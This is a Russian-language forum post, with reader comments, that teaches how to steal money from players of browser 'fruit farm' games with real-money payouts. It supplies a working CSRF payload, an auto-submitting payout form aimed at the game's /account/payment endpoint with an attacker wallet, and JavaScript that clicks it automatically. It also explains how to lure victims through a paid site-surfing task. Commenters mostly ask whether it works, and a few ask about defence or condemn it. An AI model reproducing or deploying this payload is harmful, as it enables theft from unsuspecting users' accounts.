Как взломать Экономическую игру с выводом денег FF (fruit farm)

Всем привет и сегодня я покажу как очень просто можно обмануть ферму путем ее некоторой уязвимости

CSRF (Cross-Site Request Forgery) – атака, позволяющая хакеру выполнить на целевом сайте различные действия от имени других, зарегистрированных посетителей.

Абсолютно все движки игр подвержены этой уязвимости! Благодаря ей можно сделать в чужом аккаунте всё что угодно, но самое привлекательное это списать чужие средства на свой кошелек.

Делается это просто, первым делом подготавливаем форму заказа выплаты.

<form action = "http://имя_вашего_сайта/account/payment" method = "post" >
<input type = "text" name= "purse" value = "P000000">
<input type = "text" name= "sum" value = "50">
<input type = "text" name= "val_type" value = "RUB">
<input type="submit" id="myButton" onclick="myFunc()" >
</form>

Далее под ней вставляем javascript код который заставит браузер нажать на кнопку формы.

<script>
setTimeout(function() {document.getElementById("myButton").click();},1);
</script>

Все почти готово, теперь самое главное нам нужно как то заманить свою жертву, я предлагаю скачать любой скрипт с нашего сайта и установить на бесплатный хостинг ( к примеру на timeweb.ru дают 10 дней бесплатного хостинга) далее

идем к примеру серфинг сайтов даем задание на наш сайт, указываем ссылку на наш заранее установленный на бесплатный хостинг сайт и после того как статус нашего задания будет доступен для исполнения, мы можем заливать наш скрипт в любом файле на вашем сайте и дело в шляпе

после перехода человека по вашей ссылке и нажатии на сайте подтверждения серфинга, скрипт автоматически сделает вывод на ваш кошелек указанный в скрипте. Вот и все спасибо за внимание!

---

Вернуться назад

3

Жалоба

Playgame 2017-03-14

отличный скрипт ))

3

Жалоба

qazxswedc 2017-04-15

надо опробовать

3

Жалоба

blazzy 2017-05-16

Цитата: qazxswedc

ия серфинга, скрипт автоматически сделает вывод на ваш кошелек указанный в скрипте. Вот и все спасибо за внимание!

Скажите, удалось ли вывести все средства юзера?

3

Жалоба

lis 2017-06-15

Работает вообще?

3

Жалоба

Dedser 2017-10-31

Интересно наверное.

3

Жалоба

Igoora 2018-03-05

А как защитить от него свой сайт?

3

Жалоба

ipkpot 2018-03-06

Прикольная штучка. Надо взять на вооружение!

3

Жалоба

puma 2018-03-06

да о защите интересно узнать!

Этот ваш скрипт он на какой серф действует на выплату который или любой?

3

Жалоба

Eraly 2018-07-07

Друзья куда вставлять эти коды? В pages/_index или как???
Вставлял код на pages/_index и страница бесконечко автообновлялся это норм или как???

Жаль но не работает

2

Жалоба

саша 2018-10-25

http://www.fsb.ru по вам всем тюрьма плачет соберу на вас компромат и найдут вас жульё воры

2

Жалоба

blazzy 2020-02-10

Цитата: Igrok111

Цитата: Playgame

отличный скрипт ))

ченго хорошего человек учит тырить бабки вы что такое выкладывать, это вобще уголовная статья

и какая же статья? или тебе лишь бы брякнуть